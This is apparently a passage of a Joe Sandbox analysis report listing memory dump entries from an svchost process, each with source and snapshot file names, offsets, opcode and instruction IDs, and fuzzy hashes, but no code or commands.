                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: aa367dbb0ce3b67fc5623d13d6ff14d8f12e9124d022fa9e67b3b77f9a1d6da8
                                                                                                                                                                                      • Instruction ID: 907a8025e86e8c55de98a832462f8f558cfa3b9573759436636934fe126ef434
                                                                                                                                                                                      • Opcode Fuzzy Hash: aa367dbb0ce3b67fc5623d13d6ff14d8f12e9124d022fa9e67b3b77f9a1d6da8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7532F6B060DA4A4FE799EF38D4A5A7977E9FF45300B1401FDE48AC76E2DE24AC428741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1982421146.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4b060000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a449de9c327d7d9d765dc95dfad77cae29a6ffc5d413ec5bb332c692c702ebd1
                                                                                                                                                                                      • Instruction ID: 2d5481784bce96cc62b0c9ea999f2c5b388c9fb1335653a2f0a90661ab199a27
                                                                                                                                                                                      • Opcode Fuzzy Hash: a449de9c327d7d9d765dc95dfad77cae29a6ffc5d413ec5bb332c692c702ebd1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6732F6B280D6C64FE756EF38C8565A47FE0FF56301F0841FED589CB2A2D928A816C391
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4f809ab57bd89180f22e83ab448eca4280b035b0e55fd77d2596533d3fda1e69
                                                                                                                                                                                      • Instruction ID: 06fe378105fb3a978ab405c34afe6c5fb51b09980f0de48fe268ead1163981f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f809ab57bd89180f22e83ab448eca4280b035b0e55fd77d2596533d3fda1e69
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0E133B190DE468FEB5DAE39C4916B9B7D5EF95310B2401FDD48BCB4C2DE28B8468780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6bccbab4e96079de15bb040664a445241226d5874af6840537acf479f2015be2
                                                                                                                                                                                      • Instruction ID: 908c323bde4036b029a319efcaf663a2906761de3248284cb3b4c4ad19656965
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bccbab4e96079de15bb040664a445241226d5874af6840537acf479f2015be2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED1E37190DA5A8FDF99EF28C540AE9B3A1FF54304B2409FDD41ADB1D6DF24E8068780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: aeec919c33fd0749beb0985576a27869ef75f038652349b9b4b7ffb5c26a0669
                                                                                                                                                                                      • Instruction ID: 7c5cc132fd5127cfa96b9ef647e3e67a105ae0ade3cba7360ab9feaadeaf618d
                                                                                                                                                                                      • Opcode Fuzzy Hash: aeec919c33fd0749beb0985576a27869ef75f038652349b9b4b7ffb5c26a0669
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62C117B190DA894FF7A4EF7CC8A66A87BF9FF59310F1401F9D88CC7292DA2458468741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e14e4675ab595fd95d3da9a7927a224ef0b907ecff77399288d4dbdbdde0f383
                                                                                                                                                                                      • Instruction ID: cf35fb58ee698362c8a811554551334caa2ecb9dda758623c2ec86e947c40ffe
                                                                                                                                                                                      • Opcode Fuzzy Hash: e14e4675ab595fd95d3da9a7927a224ef0b907ecff77399288d4dbdbdde0f383
                                                                                                                                                                                      • Instruction Fuzzy Hash: 03B1269250E6C60FE70A6B3899611B5BFE5DF93390B1902FFD089CB0E3D91D9906C391
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d5f3c16208504240d04a0c41f0feef8792f534431aba7f126b9be58a4e708d2e
                                                                                                                                                                                      • Instruction ID: 7908d6ba46c142733d02415f463a95873145ab35ab5505f197bf51bec8a2e3d0
                                                                                                                                                                                      • Opcode Fuzzy Hash: d5f3c16208504240d04a0c41f0feef8792f534431aba7f126b9be58a4e708d2e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3481347050DB4A4FE716FF38D8844A0BBE0EF95310B6945FED09AC71E7DA29A886C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c2c6d22348bdfac2e01d6cc22fe8e990f6e1e2fc1ed37be6f2145b1175aa30d1
                                                                                                                                                                                      • Instruction ID: 0cd854eae980217adbf7cf4457d83f5a1f0913363678f58f1e28fed74ebcff93
                                                                                                                                                                                      • Opcode Fuzzy Hash: c2c6d22348bdfac2e01d6cc22fe8e990f6e1e2fc1ed37be6f2145b1175aa30d1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 109160B1D1DA898FDB49EF68C4956A8BBF1EF55340F5400FDD049DB2E2DB24A842CB90
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d13cb61e6370752eacb15e0387625306da8b6f1d03ee2edb3f45a3fe9d9ede6e
                                                                                                                                                                                      • Instruction ID: 843354aa10fd00f7167bddf741a1358bada69f5327ec141b38b45ed472871ddc
                                                                                                                                                                                      • Opcode Fuzzy Hash: d13cb61e6370752eacb15e0387625306da8b6f1d03ee2edb3f45a3fe9d9ede6e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2671F371A0C9894FDB59EF6CD465AB97BE5EF59310F0401EEE44DC72A6CE24AC02C741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 73b43aa9d4ee0e76b5acc0000a0d3bbd5bfe80976a3e835afb3a92813b031616
                                                                                                                                                                                      • Instruction ID: ce5f18c71d7e054cc7ee2049652d7c4379801552d6547a5d18317bb6728facd7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 73b43aa9d4ee0e76b5acc0000a0d3bbd5bfe80976a3e835afb3a92813b031616
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7781D7B091CA4E8FDB49EF28C5906A9B7A2FF95300B2445FDD00EC71D6DB35A882C780
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d3eff9d80b7055cd35da513d115f2489324c1a16b6214f9c5b897a391419e8dc
                                                                                                                                                                                      • Instruction ID: f34ceff246778d36814459ace49db1983e7f373bd7d7d61fd060d8a87e28f6a6
                                                                                                                                                                                      • Opcode Fuzzy Hash: d3eff9d80b7055cd35da513d115f2489324c1a16b6214f9c5b897a391419e8dc
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE7138B290E7864FE3A5AE38D5A26B477FCEF41310B2401F9C449C76D3EA19AC4A8745
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6fa34549d1c823cd34fe5a3e9776e9ae22d7aa6a5862852a3ede65b4b9157c30
                                                                                                                                                                                      • Instruction ID: 8a75c3393b75b7a5266b1f2deeae1262fe0299ed3168c0a198e77c4a1f6d22ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fa34549d1c823cd34fe5a3e9776e9ae22d7aa6a5862852a3ede65b4b9157c30
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6061927591D91A8FEF89EF24C490AE9B3E1FF54304B640ABCD419DB19ADB35E442CB80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2f45fcb07dd2267ef780d44e15e36878ca16c6b0aab4d3c61d7cbbabdf87265a
                                                                                                                                                                                      • Instruction ID: bc4a150ef0d6253eb709e1ad7d48192b9b199ea62347c44a295dd56613ebe403
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f45fcb07dd2267ef780d44e15e36878ca16c6b0aab4d3c61d7cbbabdf87265a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E751377191DB864FD719DF28C891569FBE2EFD6201B1446FED0CAC72E2DB24A406C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5f88caf0fa92f5d695c5f7c79e56ed5cb0ad7c907190b50a1de16b0716c6b917
                                                                                                                                                                                      • Instruction ID: a4269e31958a5cdb2e5dc386b701b2eafac75cbe8c1bd904be35e32ea771a9a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f88caf0fa92f5d695c5f7c79e56ed5cb0ad7c907190b50a1de16b0716c6b917
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8951477161D7884FD759AE38C851475BBE1EF86710B1402BEE48BC32D6CE29A803C382
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d061a2b4c0d763383f630ab1d52e091da0692fa25ff3b4d49f9c20f536549a87
                                                                                                                                                                                      • Instruction ID: ba98ab3ef1b68cc45841404fbfd9f30f226b6d88b1a386ec6ae259fb2a43bac7
                                                                                                                                                                                      • Opcode Fuzzy Hash: d061a2b4c0d763383f630ab1d52e091da0692fa25ff3b4d49f9c20f536549a87
                                                                                                                                                                                      • Instruction Fuzzy Hash: 605181B190DA4D8FCB45EF68C4A56E97FF1EF1A301B0801EED44AD76A2CA25A841C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1982421146.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4b060000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bce5079cdb6ca69b2242e43c086e53e058c994a30d057d9f9de819f3e9942554
                                                                                                                                                                                      • Instruction ID: 81e4098265ec73f49b64400fbc6eec69207a94d7812b1e39d99384a6ac12e978
                                                                                                                                                                                      • Opcode Fuzzy Hash: bce5079cdb6ca69b2242e43c086e53e058c994a30d057d9f9de819f3e9942554
                                                                                                                                                                                      • Instruction Fuzzy Hash: C05138B280DA8A4FDB55EF3CC8961A47FF1FF65301B0441BED18ACB6A2D924A815C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 09143671d7f89f63b2c9093b7cd5eaca66cb2ec211e3b57191d7dca20d3715eb
                                                                                                                                                                                      • Instruction ID: 91292ad1cb1f8f08874adff16218af4b165b2925bd8018a996a921ca870cd149
                                                                                                                                                                                      • Opcode Fuzzy Hash: 09143671d7f89f63b2c9093b7cd5eaca66cb2ec211e3b57191d7dca20d3715eb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E5127B1A0DB494FE7A9EF28D5916B477E8EF95310F2401FDC44AC72D2DE28A8468781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 93f8d48e50484a6b1b6592a049fef26290e607bec92e00f042a9c3a43979f709
                                                                                                                                                                                      • Instruction ID: a74104ba9201527bd63321b746e9684e9fc69f2da13167ad99a6bda3e9200f42
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93f8d48e50484a6b1b6592a049fef26290e607bec92e00f042a9c3a43979f709
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F51C6B1D18A8D8FEB94EFB8C8956ACBBF5FF19300F1401A9D449D7292CD3458828B01
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8342788e6ab807760b7d734c8316e61d4c17afb1ad87bf59a785e196b0c1d83b
                                                                                                                                                                                      • Instruction ID: f997cc68672b90c4c2bc4d3482feb940c4f3865a838ff2ccc09eda31a3d8f155
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8342788e6ab807760b7d734c8316e61d4c17afb1ad87bf59a785e196b0c1d83b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68412AD2A1DAC60FE3559A7884673A56BD1DF96650F5802FED488C71D3DE1C68038352
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 823549c20dcaf6510fbb21305ae01db7b3bb3f2e05e69d27fb1259b10e386042
                                                                                                                                                                                      • Instruction ID: a4b6ad09b54bb1733abc68987ebb59e8efe30d4f7c62121c6ae99b6a86c0ffd3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 823549c20dcaf6510fbb21305ae01db7b3bb3f2e05e69d27fb1259b10e386042
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4341F17161CB864BDB58DF28C491529B7E2FBE5311F2486BEE0CAC33E5DA34E4428781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c292662648d56f6940ed5892269d5c91cdd2bea40de4c5032b4494c942b9c35a
                                                                                                                                                                                      • Instruction ID: 34fd46b6cd78dbfd93735e1d370f102ca51dab906d9dbbf0c1301d0a6fe43c08
                                                                                                                                                                                      • Opcode Fuzzy Hash: c292662648d56f6940ed5892269d5c91cdd2bea40de4c5032b4494c942b9c35a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7341BFB061CB864BD718DE28C49142ABBE2FFD5201F2485BDE4DAC3395DB34E4428B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 50a08f1efc975aab5ffbce05fa6003d450f027d8050056485fdca484cc570189
                                                                                                                                                                                      • Instruction ID: 3f64ae6550be33a810c265963c98745b1a53ca0d188a67f8dbd75faf920c9952
                                                                                                                                                                                      • Opcode Fuzzy Hash: 50a08f1efc975aab5ffbce05fa6003d450f027d8050056485fdca484cc570189
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931E27061CB854BD719DF28C492469BBE2FFD6201B2485BDE4DAC3295DB38E452CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 76e8abc6a13e666b85149cf2780e85d9bcf5934d1a650761f30601ef5e9dcdc2
                                                                                                                                                                                      • Instruction ID: a3a67badfdb8f6c6765da8a69a0e35cd18d67d996fc9d110851bfabd2289c37a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 76e8abc6a13e666b85149cf2780e85d9bcf5934d1a650761f30601ef5e9dcdc2
                                                                                                                                                                                      • Instruction Fuzzy Hash: C431F07161CB854BD708DF28C482469FBE2FBE5311B2486BEE4CAC33A5DA34E445CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 13c0ef382854e8df59f8af8c27d06e07c0bb9122a76323ef0778348ffda12a82
                                                                                                                                                                                      • Instruction ID: efd2e41edb84b6ebbf2fcd557240d8737088feadd3f9268b11013ac53fdbd512
                                                                                                                                                                                      • Opcode Fuzzy Hash: 13c0ef382854e8df59f8af8c27d06e07c0bb9122a76323ef0778348ffda12a82
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA2106A1B1EE4E4FEB88EEBCD859378A7C5EB98251B5801FEE44DC32D2CD249C458351
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: eb7896ad699eeaa25755c6d30ee3139160e1b6aab9161cf7589e4e47370159b3
                                                                                                                                                                                      • Instruction ID: 678e1b1f99b0bb4e45bb4756be78812d37d39e85aa8d910a76378b45d24090d6
                                                                                                                                                                                      • Opcode Fuzzy Hash: eb7896ad699eeaa25755c6d30ee3139160e1b6aab9161cf7589e4e47370159b3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B21037061CA494FE354EF38C895061B7E1FB9930972445FEE49AC32E6DE29E842C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c24879c4e88247f83cc60d60913d25583364e167da0b1fb5afdafcd3cccb5c5d
                                                                                                                                                                                      • Instruction ID: 6f08029449cb8b16c0a8e392507c436987f41dc1fa9519e474ffe72f3f38d7eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: c24879c4e88247f83cc60d60913d25583364e167da0b1fb5afdafcd3cccb5c5d
                                                                                                                                                                                      • Instruction Fuzzy Hash: C821D07190CA494FE741FF38C4552B9B7E9EF59300F5806BED88CD71E2DE28A9828381
